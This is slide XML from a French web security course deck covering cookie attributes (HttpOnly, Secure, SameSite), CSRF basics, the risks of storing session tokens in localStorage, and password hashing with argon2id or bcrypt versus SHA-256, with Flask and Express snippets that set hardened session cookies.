            <a:off x="1325880" y="259689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Même un clic depuis un e-mail : le cookie reste à la maison. Plus dur. Plus pénible (lien « ouvrir mon app »).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rounded Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="3236975"/>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1005840" y="3236975"/>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325880" y="3273551"/>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None  ·  exige Secure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="349300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cookie part partout, y compris en embed. CSRF grand ouvert sauf autre jeton. Rarement le bon choix pour une session.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="4151375"/>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SameSite ≠ HttpOnly. Un XSS sur VOTRE page lit encore le cookie (sauf HttpOnly). SameSite empêche un AUTRE SITE d’entraîner le cookie.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="5596128"/>
            <a:ext cx="10058400" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="64748B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>CSRF, en une ligne : un autre site déclenche une action chez vous, avec votre cookie, sans que vous l’ayez voulu.</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s2_03_samesite</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Que laisse passer SameSite=Lax ?</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Ouvrez day-1/s2_03_samesite. Un site espion local tente deux requêtes vers l’app vulnérable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Lax bloque le fetch() cross-site. Un vrai clic GET top-level, lui, passe encore. Comparez.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1536192"/>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local  ·  day-1/s2_03_samesite</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17" descr="d1s2-samesite-lax.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1025280" y="1828800"/>
            <a:ext cx="10110959" cy="3547872"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>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À retenir : Lax ne bloque pas tout. Un GET de navigation (lien, bouton) emporte encore le cookie.</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C · snippet 2/2</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Correctif : on décommente, c’est tout</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rounded Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1115568"/>
            <a:ext cx="10058400" cy="1874519"/>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874519"/>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Flask</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207008" y="1426464"/>
            <a:ext cx="9729216" cy="1490471"/>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response.set_cookie(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    "session", token,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    httponly=True,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    secure=True,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    samesite="Lax",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    path="/",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    max_age=60 * 60,</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return jsonify(ok=True, user=user)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t/>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rounded Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="3081527"/>
            <a:ext cx="10058400" cy="199339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3081527"/>
            <a:ext cx="64008" cy="199339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3154679"/>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Express</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207008" y="3392423"/>
            <a:ext cx="9729216" cy="160934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response.cookie("session", token, {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  httpOnly: true,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  secure: true,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  sameSite: "lax",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  path: "/",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  maxAge: 60 * 60 * 1000,</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response.json({ ok: true, user });</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="11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httpOnly : JS se tait. sameSite lax : POST cross-site non. Les deux stacks. Virez l’ancien cookie avant de retester.</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expliquer HttpOnly, Secure, SameSite, Path, Domain</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lire un cookie avec document.cookie — et dire quand ça échoue</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dire pourquoi localStorage pour un token de session est presque toujours faux</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="3749040"/>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97280" y="3858768"/>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04</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1920240" y="3877056"/>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reconnaître un cookie volable dans DevTools</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2699308" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Cookies, sessions, localStorage</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expliquer HttpOnly, Secure, SameSite, Path, Domain</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HttpOnly : JS ne lit pas. Secure : HTTPS only. SameSite Lax : pas de POST cross-site. Path / Domain : cet hôte, pas les cousins.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="2414015"/>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2374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54203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lire un cookie avec document.cookie — et dire quand ça échoue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1920240" y="2871215"/>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Ça échoue quand HttpOnly est posé. C’est le test. Pas un bug.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="3218687"/>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328415"/>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346703"/>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dire pourquoi localStorage pour un token de session est presque toujours faux</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1920240" y="3675887"/>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N’importe quel JS de la page le lit. XSS = session volée.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="4023359"/>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97280" y="4133087"/>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04</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1920240" y="4151375"/>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reconnaître un cookie volable dans DevTools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1920240" y="4480559"/>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Application → Cookies : HttpOnly false, Secure false, SameSite None.</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37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03</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Password hashing</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talk + Lab A (hashrate) + Lab B (rainbow)  ·  argon2 vs SHA-256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03 · 1</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SHA-256 n’est pas un hash de mot de passe</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Un hash de mot de passe doit être lent, salé, unique par utilisateur.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SHA-256 est rapide. Une carte graphique teste des milliards de candidats.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Aujourd’hui : argon2id (préféré) ou bcrypt. Pas un hash maison.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rounded Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6537960" y="1051560"/>
            <a:ext cx="2172614" cy="4434840"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FE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720840" y="1371600"/>
            <a:ext cx="1901037" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="DC2626"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SHA-256</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6720840" y="1783080"/>
            <a:ext cx="1901037" cy="1097280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>trop rapide</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rounded Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8891625" y="1051560"/>
            <a:ext cx="2172614" cy="4434840"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F0F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074505" y="1371600"/>
            <a:ext cx="1901037" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="16A34A"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>argon2id</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9074505" y="1783080"/>
            <a:ext cx="1901037" cy="1097280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>lent, salé</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39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03 · lexique</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Les mots de cette section, sans jargon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1060704"/>
            <a:ext cx="10058400" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>On les revoit dans les labs. Ici : une phrase chacun.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rounded Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1444751"/>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444751"/>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25880" y="148132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Sel (salt)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="170078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Une valeur aléatoire, unique par mot de passe, rangée avec le hash. Même mot de passe → hashes différents. Les rainbow tables meurent.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rounded Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="2340863"/>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05840" y="2340863"/>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325880" y="2377439"/>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Pepper</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="259689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Un secret du serveur, pas dans la ligne SQL. La base fuit : il manque encore le pepper. Ce n’est pas un deuxième sel.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rounded Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="3236975"/>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1005840" y="3236975"/>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325880" y="3273551"/>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Rotation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="349300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On change le pepper, ou l’algo. Au prochain login, on re-hashe. On tourne si le pepper fuit — pas à chaque dump de hashes.</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10058400" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>03 · 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="877824"/>
            <a:ext cx="10058400" cy="420624"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Ce qu’on range en base de données</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1371600"/>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1005840" y="1554480"/>
            <a:ext cx="10058400" cy="54864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554480"/>
            <a:ext cx="64008" cy="54864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25880" y="1609344"/>
            <a:ext cx="9601200" cy="475488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1500" b="0">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>jamais le mot de passe en clair</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rounded Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="2176272"/>
            <a:ext cx="10058400" cy="54864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176272"/>
            <a:ext cx="64008" cy="54864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2231136"/>
            <a:ext cx="9601200" cy="475488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1500" b="0">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>jamais un hash sans sel (le sel est déjà dans le hash bcrypt/argon2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rounded Rectangle 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="2798064"/>
            <a:ext cx="10058400" cy="54864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005840" y="2798064"/>
            <a:ext cx="64008" cy="54864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325880" y="2852928"/>
            <a:ext cx="9601200" cy="475488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1500" b="0">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
